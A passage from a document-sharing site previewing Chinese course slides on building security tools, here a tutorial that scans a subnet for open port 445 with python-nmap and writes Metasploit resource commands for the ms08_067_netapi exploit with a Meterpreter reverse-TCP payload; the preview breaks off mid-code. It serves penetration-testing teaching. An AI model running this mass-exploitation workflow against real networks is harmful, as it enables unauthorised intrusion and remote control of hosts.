信息安全工具开发 任务讲解与实施(课中) 设置TCP反弹连接的Payload(PPT).pptxVIP

信息安全工具开发 任务讲解与实施(课中) 设置TCP反弹连接的Payload(PPT).pptx

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
知识点:设置TCP反弹连接的Payload0302050807040106ms08-067_netapi漏洞两个可用攻击特征攻击用密码列表制作 Metasploit框架下载安装利用Metasploit的执行攻击的步骤目录启动配置文件执行攻击利用python-nmap模块探测主机445端口设置TCP反弹连接的Payload针对用户名和密码组合暴破7设置TCP反弹连接的Payload设置TCP反弹连接的PayloadPayload:能实现攻击的部分,可能是一段代码或命令。反弹连接:为了突破防火墙的限制,实现被控主机主动向控制机发起连接的一种技术。设置TCP反弹连接的Payload通过metasploit我们可以对存在ms08-067漏洞的主机进行攻击,并可获得了一个 shell。如果对一个网段攻击重复上面攻击操作即可,但是整个网段或者更大范围内的主机逐个进行攻击,这个过程会花费大量的时间来修改配置文件,但是如果利用Python,我们可以生成一个快速的扫描脚本,扫描 445 端口打开的主机,然后利用 Metasploit 资源文件攻击有漏洞的主机。设置TCP反弹连接的Payloaddef findTgts(subNet): nmScan = nmap.PortScanner() nmScan.scan(subNet, 445) tgtHosts = [] for host in nmScan.all_hosts(): if nmScan[host].has_tcp(445): state = nmScan[host][tcp][445][state] if state == open: print ([+] Found Target Host: + host) tgtHosts.append(host)设置TCP反弹连接的Payload分析代码:首先,我们可以从先前的端口扫描的例子中利用 python-nmap 模块。这里,函数 findTgts()以潜在目标主机作为输入,返回所有开了 TCP 445 端口的主机。TCP 445 端口是 SMB 协议的主要端口。只要主机的 TCP 445 端口是开放的,我们的脚本就能有效的攻击,这会消除主机对我们尝试连接的阻碍。函数通过迭代扫描所有的主机,如果函数发现主机开放了 445 端口,就将主机加入列表中。完成迭代后,函数会返回包含所有开放 445 端口主机的列表。设置TCP反弹连接的Payloaddef setupHandler(configFile, lhost, lport): configFile.write(use exploit/multi/handler\n) configFile.write(set PAYLOAD windows/meterpreter/reverse_tcp\n) configFile.write(set LPORT + str(lport) + \n) configFile.write(set LHOST + lhost + \n) configFile.write(exploit -j -z\n) configFile.write(setg DisablePayloadHandler 1\n)设置TCP反弹连接的Payload分析代码:对攻击的目标设置监听,监听器或者命令行与控制信道,一旦渗透成功我们就可以与远程目标主机进行交互。Metasploit 提供了先进的动态的攻击荷载 Meterpreter。Metasploit 的 Meterpreter 运行在远程主机上,返回给我们命令行用来控制主机,提供了大量的控制和分析目标主机的能力。当 Meterpreter 反向连接到攻击者主机,并控制主机的 Metasploit 的模块叫做 multi/handler。为了在我们的主机上设置 multi/handler 的监听器,我们首先要写下指令到 Metasploit 的资源配置文件中。注意:我们将设置一个全局配置 DisablePayloadHandler 来标识以后我们所有的主机都不必设置监听器,因为我们已经正在监听了。设置TCP反弹连接的Payloaddef confickerExploit(configFile, tgtHost, lhost, lport): configFile.write(use exploit/windows/smb/ms08_067_netapi\n) configFile.write(set RHOST + str(tgtHost) + \n) configFile.write(set PAYLOAD windows/meterpreter/reverse_tcp\n) configFile.write(set LP

您可能关注的文档

文档评论(0)

WanDocx + 关注
实名认证
文档贡献者

大部分文档都有全套资料,如需打包优惠下载,请留言联系。 所有资料均来源于互联网公开下载资源,如有侵权,请联系管理员及时删除。

1亿VIP精品文档

相关文档